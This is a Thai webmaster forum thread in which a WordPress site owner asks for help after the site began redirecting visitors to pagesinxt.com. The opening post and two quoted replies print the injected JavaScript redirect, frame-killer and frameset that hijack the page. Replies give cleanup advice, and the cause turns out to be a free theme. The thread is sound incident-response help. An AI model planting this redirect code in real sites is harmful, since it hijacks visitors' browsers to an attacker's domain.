ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์Programmingช่วยด้วย โดน hack web ครับ
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ช่วยด้วย โดน hack web ครับ  (อ่าน 2687 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
toucheva
Verified Seller
ก๊วนเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 390



ดูรายละเอียด
« เมื่อ: 27 มีนาคม 2013, 09:07:29 »

โดนเจ้า pagesinxt.com เล่นงานครับ
ใช้ wordpress อยู่
มันไปแก้ไฟล์ในโฮสเรา แต่หาไม่เจอว่าแก้ไฟล์ไหน
ช่วยดูทีครับ มันอยู่ตรงไหน ผมหาไม่เจอ

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd ">
<html xmlns="http://www.w3.org/1999/xhtml " dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11 ">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>

<link rel="stylesheet" href="http://halogenreadinglightfloo...ntent/themes/Minimal/style.css " type="text/css" media="screen" />
<link rel="alternate" type="application/rss xml" title="Halogen Reading Light Floor Lamp RSS Feed" href="http://halogenreadinglightfloorlamp.offerusashop.com/feed/ " />
<link rel="alternate" type="application/atom xml" title="Halogen Reading Light Floor Lamp Atom Feed" href="http://halogenreadinglightfloo...mp.offerusashop.com/feed/atom/ " />
<link rel="pingback" href="http://halogenreadinglightfloo...mp.offerusashop.com/xmlrpc.php " />

<!--[if lt IE 7]>
   <link rel="stylesheet" type="text/css" href="http://halogenreadinglightfloo...hemes/Minimal/css/ie6style.css " />
   <script type="text/javascript" src="http://halogenreadinglightfloo...js/DD_belatedPNG_0.0.8a-min.js "></script>
   <script type="text/javascript">DD_belatedPNG.fix('img#logo, #header #search-form, #slogan, a#left_arrow, a#right_arrow, div.slide img.thumb, div#controllers a, a.readmore, a.readmore span, #services .one-third, #services .one-third.first img.icon, #services img.icon, div.sidebar-block .widget ul li');</script>
<![endif]-->
<!--[if IE 7]>
   <link rel="stylesheet" type="text/css" href="http://halogenreadinglightfloo...hemes/Minimal/css/ie7style.css " />
<![endif]-->

<script type="text/javascript">
   document.documentElement.className = 'js';
</script>

<link rel="alternate" type="application/rss xml" title="Halogen Reading Light Floor Lamp &raquo; Feed" href="http://halogenreadinglightfloorlamp.offerusashop.com/feed/ " />
<link rel="alternate" type="application/rss xml" title="Halogen Reading Light Floor Lamp &raquo; Comments Feed" href="http://halogenreadinglightfloo...fferusashop.com/comments/feed/ " />
      <link rel="stylesheet" href="http://halogenreadinglightfloo...tent/themes/Minimal/style-.css " type="text/css" media="screen" />
   <meta content="Minimal v.3.3" name="generator"/><link media="screen" type="text/css" href="http://halogenreadinglightfloo...ybox/jquery.fancybox-1.3.4.css " rel="stylesheet" />
<link media="screen" type="text/css" href="http://halogenreadinglightfloo...e_templates/page_templates.css " rel="stylesheet" /><link rel='stylesheet' id='et-shortcodes-css-css'  href='http://halogenreadinglightfloo...es/shortcodes.css?ver=1.8' type='text/css' media='all' />
<link rel='stylesheet' id='wp-pagenavi-css'  href='http://halogenreadinglightfloo...pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://halogenreadinglightfloo...query/jquery.js?ver=1.7.1' ></script>
<script type='text/javascript' src='http://halogenreadinglightfloo...codes_frontend.js?ver=1.8' ></script>
<link rel="EditURI" type="application/rsd xml" title="RSD" href="http://halogenreadinglightfloo...fferusashop.com/xmlrpc.php?rsd " />
<link rel="wlwmanifest" type="application/wlwmanifest xml" href="http://halogenreadinglightfloo...om/wp-includes/wlwmanifest.xml " />
<meta name="generator" content="WordPress 3.3.1" />
   <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
   <style type="text/css">
      #et_pt_portfolio_gallery { margin-left: -11px; }
      .et_pt_portfolio_item { margin-left: 23px; }
      .et_portfolio_small { margin-left: -39px !important; }
      .et_portfolio_small .et_pt_portfolio_item { margin-left: 35px !important; }
      .et_portfolio_large { margin-left: -20px !important; }
      .et_portfolio_large .et_pt_portfolio_item { margin-left: 14px !important; }
   </style>

<!--
   top.location="http://pagesinxt.com/?dn=www.4...=&prvtof=TnJiT8fRRBba0gpf5 OJmt2rCjf0zCnOnT3nfjLLqZY=&poru=wMO9CpC81sPrkWBQl7hV/fJUSHMUxyr2ApnLxUO2vJ35cf1CuZFxd6YNSxDS9HUVX4hltJoM/FxfQOhfD6bhE53rR8m85yBsfaYm9Q SjU//oxnF/1oNvVAVC/xSuSFG&cifr=1&flrdr=yes&nxte=js";
   /*
-->
<script type="text/javascript">
   <!--
   dimensionUpdated = 0;
   function applyFrameKiller()
   {
      if(window.top != self)
      {
         cHeight = 0;
         if( typeof( window.innerHeight ) != 'undefined' ) {
         //Non-IE
         cHeight = window.innerHeight;
         dimensionUpdated = 1;
         } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )  ) {
         //IE 6  in 'standards compliant mode'
         cHeight = document.documentElement.clientHeight;
         dimensionUpdated = 1;
         } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
         //IE 4 compatible
         cHeight = document.body.clientHeight;
         dimensionUpdated = 1;
         }
         if( cHeight <= 250 && dimensionUpdated == 1)
         {
            window.top.location = "http://pagesinxt.com/?dn=www.4...nRsPHLhHsQ==&prvtof=G4zW6n 5Rg5dZFoNFWOTiI4W1XPu7Vcvy90e0XaVEgU=&poru=Waxdn13qPQ0iascLjvQAL11wrYvIgmDL23G6QukDgbp00zmP0Y7NBJxI3gBQJph5TXHCFpWcwwXi/KSzEKER /N3SkF K/HRw2HPsuBObLQGCRmDBX21xtccvEILYSr &cifr=1&flrdr=yes&nxte=js";
         }
      }
   }

   applyFrameKiller();
   // -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
   <frame src="http://pagesinxt.com/?dn=www.4...REwz&flrdr=yes&nxte=js ">
</frameset>
<noframes>
   <body bgcolor="#ffffff" text="#000000">
   <a href="http://pagesinxt.com/?dn=www.4...prvtof=3OKVyLX4/TAo09BLLgqJIi4 6EdWHdZOCgTkEkbTzC4=&poru=XStnu8 ayWylJWsAcyBKFM/wcTgvcMJ8pDOTcHV69Lw 9TxIQU875cgWkCflBteMy6hyJALbZcJU6QmqNkzxRitQh54cl36DDv/CLAPxtvquxFSMZ4 Y 4pwYSnlrL I&flrdr=yes&nxte=js">Click here to proceed</a>.
   </body>
</noframes><!--
*/
--></head>
<body id="home">
   <div id="page-wrap">
         
      <div id="header">
         <!-- Start Logo -->
            <a href="http://halogenreadinglightfloorlamp.offerusashop.com ">               <img src="http://halogenreadinglightfloo...themes/Minimal/images/logo.png " alt="Logo" id="logo"/></a>
            
            <p id="slogan">Halogen Reading Light Floor Lamp</p>
               
         <!-- End Logo -->
               
         <!-- Start Searchbox -->
            <div id="search-form">
               <form method="get" id="searchform1" action="http://halogenreadinglightfloorlamp.offerusashop.com/ ">
                  <input type="text" value="search this site..." name="s" id="searchinput" />
               </form>
            </div>
                        
         <!-- End Searchbox -->
            
            <div class="clear"></div>
            
                           <ul class="superfish nav clearfix">
                  
                     <li class="cat-item cat-item-1"><a href="http://halogenreadinglightfloo...op.com/category/uncategorized/ " title="View all posts filed under Uncategorized">Uncategorized</a>
</li>
   <li class="cat-item cat-item-3"><a href="http://halogenreadinglightfloo...ogen-reading-light-floor-lamp/ " title="Halogen Reading Light Floor Lamp">Halogen Reading Light Floor Lamp</a>
</li>
                  
                                 </ul> <!-- end ul.nav -->
                                       
      </div> <!-- end #header -->

      


   <div id="content" class="clearfix">
      <div id="content-area">
            
                   
<h2 class="title"><a href="http://halogenreadinglightfloo...-watt-a19-reveal-bulbs-4-pack/ ">GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack</a></h2>


<table width="500" border="0" align="center" cellspacing="5">
<tr>
<td colspan="2"></td>
<td width="154" align="right" valign="bottom"></td>
</tr>
<tr>
<td width="115" align="center" valign="top">
<div align="center">
<div align="center"><a href='http://www.amazon.com/48690-10...8;creativeASIN=B000089DC9' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><img src="http://ecx.images-amazon.com/images/I/31395sq94BL._SL75_.jpg " border='0' alt="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack"/></p>
<p> </a><a href="http://www.amazon.com/gp/offer.../B000089DC9/?tag=offusashop-20 " title="Larger Image  GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><img src="https://payments-sandbox.amazo...e=x-large&background=white " alt="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" border="0"/></a></div>
</div>
</td>
<td width="205">GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack</p>
<p><strong>Product Brand : </strong><a href="http://www.amazon.com/s/ref=nb...aps&field-keywords=General Electric&tag=offusashop-20" title="General Electric" rel="nofollow" target="_blank">General Electric</p>
<p></a><br />
<strong>Model : </strong>48688<br />
<strong>As of : </strong>Mar 26, 2013  11:28:19<a title="Add of time" href="http://zeldahost.com/amz/timeofpurchase.html " target="_blank"> Details</a></p>
<p><br clear="all" /></td>
<td align="right" valign="top">
<font style="text-decoration:line-through;"><strong>$7.70</strong></font><br />
<br clear="all" />
<div align="center">
<div align="right"><a href='http://www.amazon.com/48690-10...8;creativeASIN=B000089DC9' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank">Check Price Now<br />  </a></div>
</div>
</td>
</tr>
</table>
<table width="500" border="0" align="center">
<tr>
<td><center>=========================================</center><br />
<h2>GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack</h2>
<div align="center">    <center></p>
<div align="center">
<div align="center">  <a href='http://www.amazon.com/48690-10...8;creativeASIN=B000089DC9' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><img src="http://ecx.images-amazon.com/images/I/31395sq94BL.jpg " border='0' alt="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack"/>  </a></div>
</div>
<p></center>  </div>
<p><center><br />
<font style="text-decoration:line-through;"><strong>$7.70</strong></font><br />

<div align="center">  <a href='http://www.amazon.com/48690-10...8;creativeASIN=B000089DC9' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><font style="text-decoration:blink;color:green;"><br />
<h2>Check Price Now</h2>
<p></font><br />Usually ships in 1-2 business days<br />
  </a></div>
<p><a href='http://www.amazon.com/gp/offer...089DC9/?tag=offusashop-20' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><img src="https://payments-sandbox.amazo...e=x-large&background=white " alt="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" border="0"/></a><br />  </center><center><a href='http://www.amazon.com/48690-10...8;creativeASIN=B000089DC9' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><strong><font style="color:blue;"><br />
<h2>GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack</h2>
<p></font></strong></a></center></p>
<div align="left">
<a href='http://www.amazon.com/gp/offer...089DC9/?tag=offusashop-20' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><strong>GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack Overviews</strong></a><br />GE reveal bulbs fill your rooms with clean, beautiful light. GE reveal technology filters out dull, yellow rays, bringing out colors and patterns that go unnoticed under regular incandescent light. Use general purpose GE reveal bulbs in table lamps, floor lamps, enclosed ceiling fixtures and closet lights to make colors and patterns pop. GE reveal color-enhanced full-spectrum bulbs create enhanced, vivid surroundings in rooms and spaces throughout your home.<br clear="all" /><br />
</p>
<p><a href='http://www.amazon.com/gp/offer...089DC9/?tag=offusashop-20' title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack" rel="nofollow" target="_blank"><strong>GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack Features</strong></a>
<ul>
<li>Clean, beautiful light</li>
<li>Application: Table lamps, closet lights and standard applications</li>
<li>Base: Medium screw (E26) * Bulb Type: A19 * Watts: 100</li>
<li>Initial lumens: 630</li>
<li>60A/RVL 4-Pack</li>
</ul>
<p><br clear="all" /></p>
<p><center><br />
<iframe src="http://rcm.amazon.com/e/cm?t=o...category=electronics&f=ifr " width="468" height="60" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0"></iframe><br />
</center></div>
</td>
</tr>
</table>
                   
            
      </div> <!-- end #content-area -->
      
      
               <div id="sidebar" class="clearfix">
   <div id="search-2" class="widget sidebar-block widget_search"><h3 class="widgettitle"> </h3><form method="get" id="searchform" action="http://halogenreadinglightfloorlamp.offerusashop.com/ ">
    <div>
        <input type="text" value="" name="s" id="s" />
        <input type="submit" id="searchsubmit" value="Search" />
    </div>
</form>
</div> <!-- end .widget -->      <div id="recent-posts-2" class="widget sidebar-block widget_recent_entries">      <h3 class="widgettitle">Recent Posts</h3>      <ul>
            <li><a href="http://halogenreadinglightfloo...-watt-a19-reveal-bulbs-4-pack/ " title="GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack">GE 48690 100-Watt A19 Reveal Bulbs, 4-Pack</a></li>
            </ul>
      </div> <!-- end .widget --><div id="recent-comments-2" class="widget sidebar-block widget_recent_comments"><h3 class="widgettitle">Recent Comments</h3><ul id="recentcomments"></ul></div> <!-- end .widget --><div id="archives-2" class="widget sidebar-block widget_archive"><h3 class="widgettitle">Archives</h3>      <ul>
         <li><a href='http://halogenreadinglightfloo...offerusashop.com/2013/03/' title='March 2013'>March 2013</a></li>
      </ul>
</div> <!-- end .widget --><div id="categories-2" class="widget sidebar-block widget_categories"><h3 class="widgettitle">Categories</h3>      <ul>
   <li class="cat-item cat-item-3"><a href="http://halogenreadinglightfloo...ogen-reading-light-floor-lamp/ " title="Halogen Reading Light Floor Lamp">Halogen Reading Light Floor Lamp</a>
</li>
      </ul>
</div> <!-- end .widget --><div id="meta-2" class="widget sidebar-block widget_meta"><h3 class="widgettitle">Meta</h3>         <ul>
                  <li><a href="http://halogenreadinglightfloo....offerusashop.com/wp-login.php ">Log in</a></li>
         <li><a href="http://halogenreadinglightfloorlamp.offerusashop.com/feed/ " title="Syndicate this site using RSS 2.0">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li>
         <li><a href="http://halogenreadinglightfloo...fferusashop.com/comments/feed/ " title="The latest comments to all posts in RSS">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li>
         <li><a href="http://wordpress.org/ " title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a></li>
                  </ul>
</div> <!-- end .widget --></div> <!-- end sidebar -->            
   </div> <!-- end #content -->
    <div id="footer" >
      <div id="footer-content">
         
                        
            <ul class="bottom-menu"></ul>         
         <p id="copyright">Designed by  <a href="http://www.elegantthemes.com " title="Elegant Themes">Elegant WordPress Themes</a></p>
      </div> <!-- end #footer-content -->
   </div> <!-- end #footer -->
   http://halogenreadinglightfloorlamp.offerusashop.com is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com<br>
</div> <!-- end #page-wrap -->
   
            
      <script type="text/javascript" src="http://ajax.googleapis.com/aja...queryui/1.7.1/jquery-ui.min.js "></script>
   <script type="text/javascript" src="http://halogenreadinglightfloo...mal/js/jquery.cycle.all.min.js "></script>
   <script type="text/javascript" src="http://halogenreadinglightfloo...inimal/js/jquery.easing.1.3.js "></script>   
   <script type="text/javascript" src="http://halogenreadinglightfloo...themes/Minimal/js/superfish.js "></script>   
   <script type="text/javascript">
   //<![CDATA[
      jQuery.noConflict();
   
      jQuery('ul.superfish').superfish({
         delay:       200,                            // one second delay on mouseout
         animation:   {opacity:'show',height:'show'},  // fade-in and slide-down animation
         speed:       'fast',                          // faster animation speed
         autoArrows:  true,                           // disable generation of arrow mark-up
         dropShadows: false                            // disable drop shadows
      }).find("> li > ul > li:last-child, > li > ul > li > ul > li:last-child, > li > ul > li > ul > li > ul > li:last-child").addClass("last-nav-element");
      
      jQuery(".js #featured, .js div#tabbed").css("display","block");

            
      var $featured_content = jQuery('#featured_content'),
         $tabbed_area = jQuery('div#tabbed'),
         $controllers = jQuery('div#controllers'),
         $comments = jQuery('ol.commentlist');
      
      et_search_bar();
      
      if ($featured_content.length) {
         $featured_content.cycle({
                           timeout: 0
            ,
            speed: 300,
            cleartypeNoBg: true,
            prev:   'a#left_arrow',
            next:   'a#right_arrow',
            pager:  'div#controllers',
            fx: ''
         });
         
         var controllersWidth = $controllers.width(),
            controllersLeft = Math.round((960 - controllersWidth) / 2);
         if (controllersWidth < 960) $controllers.css('padding-left',controllersLeft);
      };
      
      if ($tabbed_area.length) {
         $tabbed_area.tabs({ fx: { opacity: 'toggle' } });
      };
      
      if ($comments.length) {
         $comments.find(">li").after('<span class="bottom_bg"></span>');
      };
      
      
      <!---- Search Bar Improvements ---->
      function et_search_bar(){
         var $searchform = jQuery('#header div#search-form'),
            $searchinput = $searchform.find("input#searchinput"),
            searchvalue = $searchinput.val();
            
         $searchinput.focus(function(){
            if (jQuery(this).val() === searchvalue) jQuery(this).val("");
         }).blur(function(){
            if (jQuery(this).val() === "") jQuery(this).val(searchvalue);
         });
      };
      
   //]]>   
   </script>
   <script type='text/javascript' src='http://halogenreadinglightfloo...ing-1.3.pack.js?ver=1.3.4' ></script>
<script type='text/javascript' src='http://halogenreadinglightfloo...x-1.3.4.pack.js?ver=1.3.4' ></script>
<script type='text/javascript' src='http://halogenreadinglightfloo...lates-frontend.js?ver=1.1' ></script>
   
</body>
</html>
บันทึกการเข้า
ardencod3
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 228



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 27 มีนาคม 2013, 09:30:11 »

ลบเฟรมแถวๆด้านบนกับ javascript ออก
อ้างถึง
<!--
   top.location="hxxp://pagesinxt.com/?dn=www.4...=&prvtof=TnJiT8fRRBba0gpf5 OJmt2rCjf0zCnOnT3nfjLLqZY=&poru=wMO9CpC81sPrkWBQl7hV/fJUSHMUxyr2ApnLxUO2vJ35cf1CuZFxd6YNSxDS9HUVX4hltJoM/FxfQOhfD6bhE53rR8m85yBsfaYm9Q SjU//oxnF/1oNvVAVC/xSuSFG&cifr=1&flrdr=yes&nxte=js";
   /*
-->
<script type="text/javascript">
   <!--
   dimensionUpdated = 0;
   function applyFrameKiller()
   {
      if(window.top != self)
      {
         cHeight = 0;
         if( typeof( window.innerHeight ) != 'undefined' ) {
         //Non-IE
         cHeight = window.innerHeight;
         dimensionUpdated = 1;
         } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )  ) {
         //IE 6  in 'standards compliant mode'
         cHeight = document.documentElement.clientHeight;
         dimensionUpdated = 1;
         } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
         //IE 4 compatible
         cHeight = document.body.clientHeight;
         dimensionUpdated = 1;
         }
         if( cHeight <= 250 && dimensionUpdated == 1)
         {
            window.top.location = "hปปp://pagesinxt.com/?dn=www.4...nRsPHLhHsQ==&prvtof=G4zW6n 5Rg5dZFoNFWOTiI4W1XPu7Vcvy90e0XaVEgU=&poru=Waxdn13qPQ0iascLjvQAL11wrYvIgmDL23G6QukDgbp00zmP0Y7NBJxI3gBQJph5TXHCFpWcwwXi/KSzEKER /N3SkF K/HRw2HPsuBObLQGCRmDBX21xtccvEILYSr &cifr=1&flrdr=yes&nxte=js";
         }
      }
   }

   applyFrameKiller();
   // -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
   <frame src="hปปp://pagesinxt.com/?dn=www.4...REwz&flrdr=yes&nxte=js ">
</frameset>
<noframes>
   <body bgcolor="#ffffff" text="#000000">
   <a href="hปปp://pagesinxt.com/?dn=www.4...prvtof=3OKVyLX4/TAo09BLLgqJIi4 6EdWHdZOCgTkEkbTzC4=&poru=XStnu8 ayWylJWsAcyBKFM/wcTgvcMJ8pDOTcHV69Lw 9TxIQU875cgWkCflBteMy6hyJALbZcJU6QmqNkzxRitQh54cl36DDv/CLAPxtvquxFSMZ4 Y 4pwYSnlrL I&flrdr=yes&nxte=js">Click here to proceed</a>.
   </body>
</noframes>
« แก้ไขครั้งสุดท้าย: 27 มีนาคม 2013, 09:32:53 โดย ardencod3 » บันทึกการเข้า

deebedding
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 199
ออฟไลน์ ออฟไลน์

กระทู้: 2,783



ดูรายละเอียด เว็บไซต์
« ตอบ #2 เมื่อ: 27 มีนาคม 2013, 09:57:35 »

ยังไงก็เอาใจช่วยให้กู้กลับมาได้นะคะ
บันทึกการเข้า

nabid999
สมุนแก๊งเสียว
*

พลังน้ำใจ: 46
ออฟไลน์ ออฟไลน์

กระทู้: 764



ดูรายละเอียด
« ตอบ #3 เมื่อ: 27 มีนาคม 2013, 09:59:51 »

ลบเฟรมแถวๆด้านบนกับ javascript ออก
อ้างถึง
<!--
   top.location="hxxp://pagesinxt.com/?dn=www.4...=&prvtof=TnJiT8fRRBba0gpf5 OJmt2rCjf0zCnOnT3nfjLLqZY=&poru=wMO9CpC81sPrkWBQl7hV/fJUSHMUxyr2ApnLxUO2vJ35cf1CuZFxd6YNSxDS9HUVX4hltJoM/FxfQOhfD6bhE53rR8m85yBsfaYm9Q SjU//oxnF/1oNvVAVC/xSuSFG&cifr=1&flrdr=yes&nxte=js";
   /*
-->
<script type="text/javascript">
   <!--
   dimensionUpdated = 0;
   function applyFrameKiller()
   {
      if(window.top != self)
      {
         cHeight = 0;
         if( typeof( window.innerHeight ) != 'undefined' ) {
         //Non-IE
         cHeight = window.innerHeight;
         dimensionUpdated = 1;
         } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )  ) {
         //IE 6  in 'standards compliant mode'
         cHeight = document.documentElement.clientHeight;
         dimensionUpdated = 1;
         } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
         //IE 4 compatible
         cHeight = document.body.clientHeight;
         dimensionUpdated = 1;
         }
         if( cHeight <= 250 && dimensionUpdated == 1)
         {
            window.top.location = "hปปp://pagesinxt.com/?dn=www.4...nRsPHLhHsQ==&prvtof=G4zW6n 5Rg5dZFoNFWOTiI4W1XPu7Vcvy90e0XaVEgU=&poru=Waxdn13qPQ0iascLjvQAL11wrYvIgmDL23G6QukDgbp00zmP0Y7NBJxI3gBQJph5TXHCFpWcwwXi/KSzEKER /N3SkF K/HRw2HPsuBObLQGCRmDBX21xtccvEILYSr &cifr=1&flrdr=yes&nxte=js";
         }
      }
   }

   applyFrameKiller();
   // -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
   <frame src="hปปp://pagesinxt.com/?dn=www.4...REwz&flrdr=yes&nxte=js ">
</frameset>
<noframes>
   <body bgcolor="#ffffff" text="#000000">
   <a href="hปปp://pagesinxt.com/?dn=www.4...prvtof=3OKVyLX4/TAo09BLLgqJIi4 6EdWHdZOCgTkEkbTzC4=&poru=XStnu8 ayWylJWsAcyBKFM/wcTgvcMJ8pDOTcHV69Lw 9TxIQU875cgWkCflBteMy6hyJALbZcJU6QmqNkzxRitQh54cl36DDv/CLAPxtvquxFSMZ4 Y 4pwYSnlrL I&flrdr=yes&nxte=js">Click here to proceed</a>.
   </body>
</noframes>

ตามนี้เลย สังเกตุดูมันจะมี link ของพวกหมาๆ อยู่ด้วยครับ ลบไปเลยทั้ง tag ครับ

Backup file ด่อนแก้ไขครับ หากพลาดจะได้ไม่เซงครับ
บันทึกการเข้า

seo-1th
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 297
ออฟไลน์ ออฟไลน์

กระทู้: 1,126



ดูรายละเอียด
« ตอบ #4 เมื่อ: 27 มีนาคม 2013, 10:00:16 »

 wanwan009
บันทึกการเข้า

toucheva
Verified Seller
ก๊วนเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 390



ดูรายละเอียด
« ตอบ #5 เมื่อ: 27 มีนาคม 2013, 10:11:23 »

หาไม่เจอครับ ไม่รู้มันไปแทรกไฟล์ไหน พอมีใครรู้บ้างไหมครับ ไฟล์ไหน
บันทึกการเข้า
nanjaow
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 353
ออฟไลน์ ออฟไลน์

กระทู้: 1,322



ดูรายละเอียด
« ตอบ #6 เมื่อ: 27 มีนาคม 2013, 10:26:05 »

เท่าที่ได้ไปศึกษาเรื่องการแฮคเว็บ
หากมันเจาะเข้ามา ถึงขั้นเปลี่ยนชื่อไฟล์ได้ขนาดนี้ละก็ = มันทำได้ทุกอย่างเหมือนกับเราแล้วหละคะ
 wanwan007
วิธีป้องกันเบื้องต้นคือ ดู log file ว่ามันเข้ามาจากทางไหน และเขียนดักไว้ให้หมดทุกช่อง
เสร็จแล้วเปลี่ยน user+pass รวมไปถึง เช็ค chmod

ปล. ต้องมั่นใจว่าเว็บที่แก้ไปนั้นเป็นไฟล์เว็บก่อนโดนแฮคด้วยนะคะ
บันทึกการเข้า
toucheva
Verified Seller
ก๊วนเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 390



ดูรายละเอียด
« ตอบ #7 เมื่อ: 27 มีนาคม 2013, 10:26:47 »

ผมลองโหลดไฟล์ทั้งหมดกลับมา แล้วหาด้วย Dreamweaver (Ctrl+F) Find and Replace หาคำว่า pagesinxt
ก็ไม่เจอเลยครับ ทีนี้มันจะไปอยู่ที่ไหนได้อีกครับ
บันทึกการเข้า
nanjaow
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 353
ออฟไลน์ ออฟไลน์

กระทู้: 1,322



ดูรายละเอียด
« ตอบ #8 เมื่อ: 27 มีนาคม 2013, 10:40:39 »

ผมลองโหลดไฟล์ทั้งหมดกลับมา แล้วหาด้วย Dreamweaver (Ctrl+F) Find and Replace หาคำว่า pagesinxt
ก็ไม่เจอเลยครับ ทีนี้มันจะไปอยู่ที่ไหนได้อีกครับ

มันต้องมีหลายชื่อและหลายไฟล์ค่ะ (เราเชื่อว่างี้นะ)
คุณต้องไปไปไล่เช็คเองทุกไฟล์และทุกไดเรคทอรี่
บันทึกการเข้า
ardencod3
ก๊วนเสียว
*

พลังน้ำใจ: 36
ออฟไลน์ ออฟไลน์

กระทู้: 228



ดูรายละเอียด เว็บไซต์
« ตอบ #9 เมื่อ: 27 มีนาคม 2013, 10:49:41 »

ผมลองโหลดไฟล์ทั้งหมดกลับมา แล้วหาด้วย Dreamweaver (Ctrl+F) Find and Replace หาคำว่า pagesinxt
ก็ไม่เจอเลยครับ ทีนี้มันจะไปอยู่ที่ไหนได้อีกครับ

ไม่มีทางเจอหรอกครับ เพราะมันเข้ารหัสไว้ทางฝั่ง php ถ้าไม่รันมันก็จะเป็นแค่โค้ตแปลกๆ แต่ที่ผมคิดไว้น่าจะอยู่ในไฟล์ template ของ wordpress ซึ่งต่อให้เข้าไปหน้าเพจไหนของเว็บเราก็โดนอยู่ดี จะให้ดีเอาโค้ตส่วน template มาแสดงเป็นกรณีศึกษาจะดีมากครับ ถ้าที่ผมคิดไว้ถูกนะ  Tongue
บันทึกการเข้า

Uball
คนรักเสียว
*

พลังน้ำใจ: 14
ออฟไลน์ ออฟไลน์

กระทู้: 118



ดูรายละเอียด เว็บไซต์
« ตอบ #10 เมื่อ: 27 มีนาคม 2013, 10:55:59 »

จากที่เห็นนี่มันน่าจะอยู่ใน file header.php ใน theme ที่กำลังใช้อยู่รึเปล่าครับ ถ้าเป็นไปได้ up file นี้มาดูหน่อยครับ

แต่ที่สำคัญสุดตอนนี้ก็ เปลี่ยน password ของ FTP ก่อนเลยครับ แล้วดู log ว่ามีคนอื่นเข้ามาบ้างรึเปล่า
« แก้ไขครั้งสุดท้าย: 27 มีนาคม 2013, 11:01:42 โดย Uball » บันทึกการเข้า

BrainFreeze
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 498
ออฟไลน์ ออฟไลน์

กระทู้: 3,887



ดูรายละเอียด เว็บไซต์
« ตอบ #11 เมื่อ: 27 มีนาคม 2013, 11:00:41 »

ลองหาคำว่า base64 ดูครับเจอชุด script เข้ารหัสมั้ย
บันทึกการเข้า

# จัดไป Promo Code ลด 11% : THAISEOBOARD
# hostatom.com |โฮสอะตอม - เว็บโฮสติ้งที่ Webmaster มืออาชีพไว้วางใจ
# Web Hosting | Cloud VPS | Reseller Hosting | Domain Name
# บริการ 24x7 | รับประกันความพอใจยินดีคืนเงิน | Uptime 99.9% | โทร : 0-2107-3466
toucheva
Verified Seller
ก๊วนเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 390



ดูรายละเอียด
« ตอบ #12 เมื่อ: 27 มีนาคม 2013, 11:19:31 »

เจอแล้วครับ มากจากทีมจริงๆด้วย
พอดีโหลดทีมจากเว็บฟรีมาใช้ โดนเลย
ขอบคุณทุกท่านมากๆครับ
บันทึกการเข้า
หน้า: [1]   ขึ้นบน
พิมพ์